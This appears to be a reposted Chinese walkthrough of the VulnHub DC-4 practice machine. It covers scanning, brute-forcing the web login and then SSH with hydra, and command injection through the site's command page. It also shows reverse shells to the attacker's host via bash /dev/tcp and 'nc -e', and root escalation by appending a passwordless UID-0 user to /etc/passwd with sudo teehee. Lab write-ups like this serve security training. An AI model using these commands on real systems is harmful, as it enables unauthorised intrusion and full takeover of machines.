DC-4靶场练习—teehee提权

Posted Thgilil

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC-4靶场练习—teehee提权相关的知识,希望对你有一定的参考价值。

DC系列第四个靶机
下载地址:https://www.vulnhub.com/entry/dc-4,313/

老规矩先扫描以下局域网内的主机ip

arp-scan -l

在这里插入图片描述
扫一下端口:

nmap -A -p- 192.168.1.101

在这里插入图片描述

只看放了22和80端口,先进80端口看看有什么
在这里插入图片描述

只有一个表单,猜测Username应该是admin,先不急着爆破。
用dirsearch扫了一下目录,只有一个登录界面:
在这里插入图片描述

所以现在只能从80或22端口找突破口了,22端口需要同时爆破账号和密码,太麻烦而且也不知道能不能爆破出来。现在尝试爆破80端口的表单,开启BP:
在这里插入图片描述

爆出来密码为happy:
在这里插入图片描述

这里即使爆破成功显示的状态码也是302,差点大意跳过了,又猛一拉下看到happy为密码的Length长度不一样

使用happy密码登录:
在这里插入图片描述

登录成功,页面很简单
点击Command发现可以通过前端执行命令:
在这里插入图片描述

抓包修改命令如下:
在这里插入图片描述
在这里插入图片描述

如此我们便可以反弹一个shell过来:
这里尝试使用bash反弹但没留意bash反弹shell的命令中的 & 符号,&符号在表单中会被认为是参数连接的标志,所以一下命令中

bash -i >& /dev/tcp/192.168.1.104/7777 0>&1

&前后的字符会被分割,所以我们只有使用不带有&符号的反弹命令——nc如下:

nc -e /bin/bash 192.168.1.104 7777

步骤:
在表单中使用命令连接kali:

nc -e /bin/bash 192.168.1.104 7777

在这里插入图片描述

kali上对7777端口进行监听:
在这里插入图片描述

连接成功!

进入后发现是非交互式shell,可以使用python升级为交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

但这里不升级shell也不影响后续操作

在home/jim/backups中找到了一份旧密码:
在这里插入图片描述

使用hydra爆破ssh

hydra -l jim -P /password.txt -vV -e ns 192.168.1.101 ssh

在这里插入图片描述

终端上连接ssh:

ssh jim@192.168.1.101 -p 22

登录成功
在这里插入图片描述

我们的最终目录是获得root下的flag,那就直奔提权去
看一下jim具有权限

find -perm -4000

在这里插入图片描述
在这里插入图片描述

重点看sudo和su,但发现jim不能使用sudo命令
在这里插入图片描述

内核漏洞也没有,到这不知道怎么办了
回头又看了一遍发现登录jim时有个提示被我选择性忽略了:
在这里插入图片描述

有一份邮件,去看看

cd var/spool/mail      //邮件存放地址
ls
cat jim

在这里插入图片描述

内容是:Charles去度假了,因此老板要求他把他的密码给jim防止出现什么问题。
可怜的老实人jim,同事周六去度假了他还要上班
在这里插入图片描述
在这里插入图片描述

登录Charles的账号,查看他的sudo权限:
在这里插入图片描述

那就使用teehee来提权了,第一次遇到teehee提权的方法,
teehee提权是使用teehee -a 把一个账号密码写入到etc/passwd中,这个用户具有root权限,再切换到这个用户即可

echo "light::0:0:::/bin/bash" | sudo teehee -a /etc/passwd    //提权语句
su light
cat /root/flag.txt

在这里插入图片描述
在这里插入图片描述

以上是关于DC-4靶场练习—teehee提权的主要内容,如果未能解决你的问题,请参考以下文章

WebBug靶场介绍篇 — 01

Web安全入门与靶场实战(32)- 利用find提权

甄选靶场Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权)

HTB靶场之-inject

ATT&CK实战系列——红队实战

pikachu靶场练习——文件包含(File Inclusion)